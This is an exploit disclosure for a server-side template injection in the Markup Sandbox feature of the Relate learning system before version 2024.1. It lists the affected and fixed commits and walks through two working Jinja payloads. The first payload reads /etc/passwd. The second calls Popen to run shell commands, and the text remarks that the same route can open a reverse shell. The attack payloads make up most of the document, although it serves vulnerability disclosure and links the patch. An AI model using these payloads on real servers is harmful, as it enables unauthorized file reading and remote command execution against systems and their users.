# Exploit Title: Relate Learning And Teaching system Version before 2024.1 SSTI(Markup Sandbox function) lead to RCE
# Date: 19/04/2024
# Exploit Author: kai6u
# Vendor Homepage: https://github.com/inducer/
# Software Link: https://github.com/inducer/relate
# Affected Version:before 2024.1 (https://github.com/inducer/relate/commit/2fdbd4480a2d0a45c746639be244a61a0d4112b6)
# Fixed Version:2024.1 (https://github.com/inducer/relate/commit/d9fa7dcb84b8e5a64ce78ced4f56cdd61c0d59aa)
# Tested on: Ubuntu 22.04
# Summary:
SSTI Markup Sandbox function of Relate Learning And Teaching system

# Description:

* 【Prerequisite】
 * The attacker has stolen the privilege to use Markup Sandbox. For example, attacker is logged in as an course administrator.

* SSTI is in the `Markup Sandbox` feature, which allows user to check Mark Down contents before publish.

1) First, the attacker uses the Markup Sandbox feature to plant the following payload.
 * Payload:
 * `{{ 'abc'.__class__.__base__.__subclasses__()[111].__subclasses__()[0].__subclasses__()[0]('/etc/passwd').read() }}`
 * Note that the subclasses index number in the payload depends on the python version, so it must be changed depending on the environment.

2) Click an Preview including the above payload.
* Then you will see that the contents of the `/etc/passwd` file are output at the Content Preview block.
* This is identified as an LFI vulnerability because it is a file that should not be read from the application side.

3) Next, the attacker modifies the above payload to execute arbitrary commands by changing the subclasses index number to the number of popen.
 * Payload:
 * `{{ 'abc'.__class__.__base__.__subclasses__()[210]('whoami',shell=True,stdout=-1).communicate()[0].strip() }}`

4) Click an Preview including the above payload.

* If you check the results, you will see that `ubuntu` is displayed, which is the result of executing the whoami command.
* This is classified as an RCE vulnerability and is very dangerous because it is possible to hijack the server directly from the application side.
* An attacker can use this feature to execute reverse shell.

# References
https://book.hacktricks.xyz/v/jp/pentesting-web/ssti-server-side-template-injection